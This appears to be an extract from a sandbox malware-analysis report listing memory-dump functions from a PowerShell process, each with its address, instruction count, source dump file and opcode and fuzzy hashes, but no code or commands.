                              • Instruction ID: d593bbe2400b376143166cdfcdfddc483ba99c5ea514a599e3f0afae9fce7e91
                              • Opcode Fuzzy Hash: 1eb28f0e705b64ed264eb2423cb5d32f4268d61a68c6beeb69bcb510f97d9220
                              • Instruction Fuzzy Hash: E3516A70A102059FDB54CF64D888BAEBBF6BF89314F144869E806EB3A1DB34EC45CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DA588 Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 93a6d312944d9626fbe70635ad47ba3d75901387f9b0a95868f86289cd63bf88
                              • Instruction ID: df2d880f14605c9a36ba31a0dcadbdec1d14085b5b84ffbbe84f307e5910f334
                              • Opcode Fuzzy Hash: 93a6d312944d9626fbe70635ad47ba3d75901387f9b0a95868f86289cd63bf88
                              • Instruction Fuzzy Hash: 3C510231B103489FCB548FA5D4546AEBBF6EF85304F14892EE9069B790DF74AC49CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3770 Relevance: .1, Instructions: 148COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 28516821d178694c783bc88a7fa127e987bc16b6a5130ec96960a9b8634149b7
                              • Instruction ID: f7d02288a489256eed0d69944a674787f595810133fadaeef5787fff4933f938
                              • Opcode Fuzzy Hash: 28516821d178694c783bc88a7fa127e987bc16b6a5130ec96960a9b8634149b7
                              • Instruction Fuzzy Hash: DD516A70A102099FDB54CF64D888BADBBF6BF89314F144469E806AB3A1DB34EC45CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DA7C0 Relevance: .1, Instructions: 145COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 224eb1f6341b584fc6d79f4d38416bbf45d2046ff743a965a590869935ab9106
                              • Instruction ID: be6c5a0ce8b453e105905ed1cf5431499aa7ea72eaa8e9a55d5968a8e0fc3325
                              • Opcode Fuzzy Hash: 224eb1f6341b584fc6d79f4d38416bbf45d2046ff743a965a590869935ab9106
                              • Instruction Fuzzy Hash: A95116316047458FC754DB74E8919AA73F6FF813087148E6ED1068B6A5EF75BC0AC7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068DA361 Relevance: .1, Instructions: 142COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e5a628bfee8a33d1d891a9da90bf6c11dd461fa452ae3c4033fea179d2679774
                              • Instruction ID: a8c3cb6bbfa5a62cd56c024afd21a3a9d4f8f5095c16f4b313796cc9b98129d1
                              • Opcode Fuzzy Hash: e5a628bfee8a33d1d891a9da90bf6c11dd461fa452ae3c4033fea179d2679774
                              • Instruction Fuzzy Hash: 5C5190303103019FE354AB79C841B6A77E6EF81720F208A2DD6268B7D1DF79EC468B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D5A29 Relevance: .1, Instructions: 138COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3503c711721383a4e6051ae72e64f054ba4794dea8311cb308ff83980c10cac
                              • Instruction ID: e15cb36055750dcf2f7d6547746478a6fb083f5d2087ecd296d1f56b102c935d
                              • Opcode Fuzzy Hash: a3503c711721383a4e6051ae72e64f054ba4794dea8311cb308ff83980c10cac
                              • Instruction Fuzzy Hash: 8D515E30A10208CFEB64DF64D958BADBBF2FF48705F144869D402AB2A1DB749C46CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068DA370 Relevance: .1, Instructions: 137COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d09f29bb43778b077b0630fc79b62c7cf563c6e175e125c3d6f457abad555427
                              • Instruction ID: 5ebdb95d50f208bafa4e593120c6014227d2f2f547018ec33f521284c2d2d463
                              • Opcode Fuzzy Hash: d09f29bb43778b077b0630fc79b62c7cf563c6e175e125c3d6f457abad555427
                              • Instruction Fuzzy Hash: C64190303107019BE354AB79C841B6A77E6EB85724F208E2DD2268B7D1DF79EC468B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DB0A8 Relevance: .1, Instructions: 135COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e45eaca9c1ba37313617f96fb9fa518f79c6714d1c4cf2deb6350197b8119a20
                              • Instruction ID: eb32bdcb46d1f1f6727c1602f327d98524f1378571b347d24f8db3374ff7b3e0
                              • Opcode Fuzzy Hash: e45eaca9c1ba37313617f96fb9fa518f79c6714d1c4cf2deb6350197b8119a20
                              • Instruction Fuzzy Hash: 8541D570E002099FDB54CFA8C844BAEB7F6EF89714F258629E515A7391DF30AC06CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D7C98 Relevance: .1, Instructions: 130COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fd657a6f8a9d5552514118adaf06c89d203af1f2d41f21c866c4d4182825b8bf
                              • Instruction ID: 27d426770706243649be6dc9d586f66cf52bbe5b3116e01fd1df205eca1cc382
                              • Opcode Fuzzy Hash: fd657a6f8a9d5552514118adaf06c89d203af1f2d41f21c866c4d4182825b8bf
                              • Instruction Fuzzy Hash: 1941E7312043499FCB05DF28D800A6EBBEAEF85354F1488AEE509CB361CB75DD16CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068D3FE9 Relevance: .1, Instructions: 130COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a9142a13b5054d6040b7efe49d2b343a772308aba1eede9bfb03903faea3aeba
                              • Instruction ID: 5e46b9e682fed6f42f07b6264f2220ae01c2928692cb18804219fcc7c72cb854
                              • Opcode Fuzzy Hash: a9142a13b5054d6040b7efe49d2b343a772308aba1eede9bfb03903faea3aeba
                              • Instruction Fuzzy Hash: 43417A30E002088FDB58DFA8D844AEDBBF2EF88354F15846AD916F7391DB399841CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3A78 Relevance: .1, Instructions: 121COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9aac219b85974c236720f90d67330309c89a6596d492bd2f4e47be1ab9f1cc03
                              • Instruction ID: a06a2d9fc4bddebc33905382c00176354bd2616bcd41fa4841a08c701485f0ed
                              • Opcode Fuzzy Hash: 9aac219b85974c236720f90d67330309c89a6596d492bd2f4e47be1ab9f1cc03
                              • Instruction Fuzzy Hash: 6F417D71B006148FDF58CF69C5403FEBBF1EF89265F058466D40AE7290EB358941CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DAB50 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef63180727ee48306b47db15ad134683751253117c4ba731591bfed360fa4d4c
                              • Instruction ID: 55ccc520ea00d03a0ad6e9bfe689d22d749e5bcc19d6bf1341f126e0959237c5
                              • Opcode Fuzzy Hash: ef63180727ee48306b47db15ad134683751253117c4ba731591bfed360fa4d4c
                              • Instruction Fuzzy Hash: F9410F34B003088FCB149F78D4087AEBBB2FB84301F14886AE9059B391DB799849CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DAF78 Relevance: .1, Instructions: 99COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d0cbc1be1ba564c85557bde1f5d3cc104dceae29c298357179f8d180a25b2096
                              • Instruction ID: 9ffc79868bde95338b0ae580376b4ddcc85137e3811a592208c770be4effdb81
                              • Opcode Fuzzy Hash: d0cbc1be1ba564c85557bde1f5d3cc104dceae29c298357179f8d180a25b2096
                              • Instruction Fuzzy Hash: A5318E7021060A9FC794DF39C48096AB7F6FF852057048E6AD41A8B721DB35FD8ACBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D6D38 Relevance: .1, Instructions: 94COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7dccb2c0a2b2544a0ffd3a97270b6efe8f25c82c1acce09ad7e3ebf3d1fe0949
                              • Instruction ID: b660071b9e3b577e14429554c82b69cc1b160432367025dec7a376a4cef6ab05
                              • Opcode Fuzzy Hash: 7dccb2c0a2b2544a0ffd3a97270b6efe8f25c82c1acce09ad7e3ebf3d1fe0949
                              • Instruction Fuzzy Hash: 6531E035B00301EFCB64CF65E844A6AB7FAFF88315F24896ED51983641DB31E845CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DA640 Relevance: .1, Instructions: 91COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 885b1a836381dd7390512cc9c02dd9f1524e179352a395c62feab558064efeee
                              • Instruction ID: 1d6ccd7efa1db23147f6375569f649a2015e444951f79e363dbfa480102c905f
                              • Opcode Fuzzy Hash: 885b1a836381dd7390512cc9c02dd9f1524e179352a395c62feab558064efeee
                              • Instruction Fuzzy Hash: 4231B031E10359AFCB55CFA4C844AAEBBF6BF89310F144919E905EB341DB70AC49CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DB438 Relevance: .1, Instructions: 90COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1b65756a0e1d303edecf9fa9e434266ad2167f9fc44104992cd779cfa1407d38
                              • Instruction ID: 390d7ddf9a3b503df0846c4f3cd0545200db4bfc881b1ecba9093241f7243be8
                              • Opcode Fuzzy Hash: 1b65756a0e1d303edecf9fa9e434266ad2167f9fc44104992cd779cfa1407d38
                              • Instruction Fuzzy Hash: 6D21F0797003049BDB44AB34D8547AEBBABDF85744F1188A9E909CB791EF389D05CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D74A1 Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dc34280d7a31e54610c4dcfc05dd6ff1aa53195c3865a50f15311166a2f5f67e
                              • Instruction ID: c3f0dfb10fef807e235fdb0fe70808631b35fa59806f418817eec19dc3ce8cfb
                              • Opcode Fuzzy Hash: dc34280d7a31e54610c4dcfc05dd6ff1aa53195c3865a50f15311166a2f5f67e
                              • Instruction Fuzzy Hash: 1F31C071A0024AAFCF55CFA4D840AFFBFBAEF88300F14406AF905A2241CB358951DBB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D4B9A Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b7a54569732ba4f530ca90b238afaf0812ae18bcfcd5aa6ae03624063ddd7673
                              • Instruction ID: 2405cf97e2a6b547167dad54140a0c5f7626d22c8ceeb707cc811304385b58b1
                              • Opcode Fuzzy Hash: b7a54569732ba4f530ca90b238afaf0812ae18bcfcd5aa6ae03624063ddd7673
                              • Instruction Fuzzy Hash: 3D318E30B002049FDB64DB74C859BEEBBF6AF88311F144569E40AA76A5DF70AC45CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D86F0 Relevance: .1, Instructions: 84COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 892402907c32766c748874d37276f45007c278572fb7e9d14d3b46f31d9dd724
                              • Instruction ID: 0849bf1ca127993662f8820b41183bf0751d42758df5f875ca46734d61bbb00f
                              • Opcode Fuzzy Hash: 892402907c32766c748874d37276f45007c278572fb7e9d14d3b46f31d9dd724
                              • Instruction Fuzzy Hash: A931BC35B143049BDB189BB4D8583AE7BB2AF88354F2448BDD40297791DF398D05CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D8C20 Relevance: .1, Instructions: 84COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 79c16b8aa84b8c12ce3077165bb8c46acd048307fd7ac2dccf98373e4a69f6b3
                              • Instruction ID: 52e6afcbc4c1e53ddd3257df2716e35d9726f91cab3c4011120755eadb9075a5
                              • Opcode Fuzzy Hash: 79c16b8aa84b8c12ce3077165bb8c46acd048307fd7ac2dccf98373e4a69f6b3
                              • Instruction Fuzzy Hash: 7221D8313463009FF7249B34ED49B2A3BA3E785725F248A3EE6058A6D0DE7298428750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D39B0 Relevance: .1, Instructions: 84COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b3e8d6f2f0e22733022ae1489c93c39cfdcde0bc98087eada70b64d894213caf
                              • Instruction ID: e27c986ea9f1a28aa73a6caa19413ca2f7e9212f5d2756bcd1dfc397990a5bfd
                              • Opcode Fuzzy Hash: b3e8d6f2f0e22733022ae1489c93c39cfdcde0bc98087eada70b64d894213caf
                              • Instruction Fuzzy Hash: 452184363002245FD700DB79E888D5ABBA6FFC9675325857AE605CB362CB32EC55C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D4BA8 Relevance: .1, Instructions: 78COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6ce29cd3b5aefbc2d65733fbe2399084a9a27ff1e722fc59a4e1b50e6270d099
                              • Instruction ID: 28a6ea63d45ddb3aa3029ea006e6bda709c64eb0e5dc03c3572c75dbeb5f4c33
                              • Opcode Fuzzy Hash: 6ce29cd3b5aefbc2d65733fbe2399084a9a27ff1e722fc59a4e1b50e6270d099
                              • Instruction Fuzzy Hash: 6531A030B002049FDB64DB74C8587AEBBF2AF88311F184569E40AE77A5DF30AC49CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D0840 Relevance: .1, Instructions: 77COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: af63a6f138eb320a88c7c1cecae116eafb645a9367722b11951d3d6f1c4da909
                              • Instruction ID: 063c39135d31703c0d077ff56b0f68962b6660df8241ebd3ce8644fda308900e
                              • Opcode Fuzzy Hash: af63a6f138eb320a88c7c1cecae116eafb645a9367722b11951d3d6f1c4da909
                              • Instruction Fuzzy Hash: EB215435F053106BE7264A20862437F62E68FC0288F0D8929D8439B286EFBCCD46C3E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3A68 Relevance: .1, Instructions: 74COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60fd8de4b48dfa7328aada0b032c8e51b2531c699c4d52f5ca98e6307dea5fc4
                              • Instruction ID: 0670fdfe8114a5f110a5386618910cb0dcadac9127f61d9f567d123a3c08c641
                              • Opcode Fuzzy Hash: 60fd8de4b48dfa7328aada0b032c8e51b2531c699c4d52f5ca98e6307dea5fc4
                              • Instruction Fuzzy Hash: 5C21A174F006158FDB58DF7999416FEBAF6DF89220F04842AE405E7340EB3589418BE2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DC2E0 Relevance: .1, Instructions: 73COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e3b78d88657d7f2c4e7db8da6100ce36d5f62da4641f0ac38c6143f85ecff64e
                              • Instruction ID: cd4f9f03db0aa5e9bbcdc4f315a157551fe20909fe87fdca0c4b9dec586b06eb
                              • Opcode Fuzzy Hash: e3b78d88657d7f2c4e7db8da6100ce36d5f62da4641f0ac38c6143f85ecff64e
                              • Instruction Fuzzy Hash: DF21D1317002549FDB45AB3894147AEBBE7EFC9310F14896EE94AC7741DF34AD098BA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D0850 Relevance: .1, Instructions: 73COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 76985b763e2ed85d88fae28216eff2cc73b053ace42afa44201727904d73c7c9
                              • Instruction ID: 227e82a2e2fee05f01090963474b34f5be2e2f496ffdfcc791a96f0262d0ecc0
                              • Opcode Fuzzy Hash: 76985b763e2ed85d88fae28216eff2cc73b053ace42afa44201727904d73c7c9
                              • Instruction Fuzzy Hash: 5111D035F002115BF7654A25812437F61EADBC0789F198929D8038B78AEFBDCD82C3D0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DB2C8 Relevance: .1, Instructions: 69COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6a57182aa197f65b8d48a4b2851db60e8be82ac476e94fdacfa600ed767fe65d
                              • Instruction ID: c73067b663aa32c00279b838da442a6490d14ccde4375f01920279ae250387f3
                              • Opcode Fuzzy Hash: 6a57182aa197f65b8d48a4b2851db60e8be82ac476e94fdacfa600ed767fe65d
                              • Instruction Fuzzy Hash: 16218075A002099FDB44DFB9D8509EEFBF6EF8D210B04842AE515E3340DB35A915CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D5CA9 Relevance: .1, Instructions: 68COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1c6280b5bce29f0436c61378deaaf0045195c9b32f75f3d0b5d106f7d5db987e
                              • Instruction ID: 336d9d561f2a1d50caa3b66cf701fec0cc8e7315b3fad3e45597df064377e7ed
                              • Opcode Fuzzy Hash: 1c6280b5bce29f0436c61378deaaf0045195c9b32f75f3d0b5d106f7d5db987e
                              • Instruction Fuzzy Hash: 8721A671A0020A9FCB10DFB8D8419AEFBF2FF48300F144A5AD555AB261D735A905CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D4CEA Relevance: .1, Instructions: 67COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b74ffdd42228076ed5ba37daa2d0300d7ca764c5b16653859ec569ed923ca4e5
                              • Instruction ID: 40eeef335b772a3c01209c77b2d166c083f4c9aefd0da31df12226c967d4ecba
                              • Opcode Fuzzy Hash: b74ffdd42228076ed5ba37daa2d0300d7ca764c5b16653859ec569ed923ca4e5
                              • Instruction Fuzzy Hash: E9219030A102049FDB64DB64D919BAE7BF5AF89710F3404A9E506EB7A5DE718D01CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DAB43 Relevance: .1, Instructions: 67COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae6219b78e0ab90d9a0bd40154a38b3efb1c50d4adcfb76b2d55ac61e21673b5
                              • Instruction ID: 55996078a4372b1f5935b1a8139cf63da8ddfeecf0b1956b679cde36a8dcd8e4
                              • Opcode Fuzzy Hash: ae6219b78e0ab90d9a0bd40154a38b3efb1c50d4adcfb76b2d55ac61e21673b5
                              • Instruction Fuzzy Hash: 5D21AF30A00309DFCB60CF18C844BEEBBF6FB45311F14895AE458A7291D374A995CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D86DB Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4c042cfe1cc4d67d52b82d86c770a5f48af588235b8b377dcc1de2d606b0bb31
                              • Instruction ID: 525d59fc1671c07d1b08d62bd04b95a5d69435a5c1cd487a03aa467fea504c5e
                              • Opcode Fuzzy Hash: 4c042cfe1cc4d67d52b82d86c770a5f48af588235b8b377dcc1de2d606b0bb31
                              • Instruction Fuzzy Hash: 78219D31B10305AFCB648BA1C9587AE7BF2AF88325F24487DD402A7691CF359D05CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D6D28 Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a511de7cb7b3ec07792318523615266844f334f334284e0b1458aeb0ad8c3011
                              • Instruction ID: 1e023cbdc9b706d9707722bd0f0d39be9913c3ed5bfef472d93e5c2db074fde1
                              • Opcode Fuzzy Hash: a511de7cb7b3ec07792318523615266844f334f334284e0b1458aeb0ad8c3011
                              • Instruction Fuzzy Hash: 95119074600306AFCB54CF76D844A67BBB9FF88354B24896DE91887241D731E942CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D5CB8 Relevance: .1, Instructions: 63COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: abdf55a23e781c2e18c0cf28686809007d147507d752e6f47f98f154201350a9
                              • Instruction ID: e34a48405331400d536358207c5e4b9a646829537df77176012e9e94334ee14d
                              • Opcode Fuzzy Hash: abdf55a23e781c2e18c0cf28686809007d147507d752e6f47f98f154201350a9
                              • Instruction Fuzzy Hash: E6214F71A006099FCB10DFA8D8819AEFBF6FF88304F104A29E515A7360DB75B905CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D7760 Relevance: .1, Instructions: 62COMMON
                              Download Yara Rule
                              Memory Dump Source
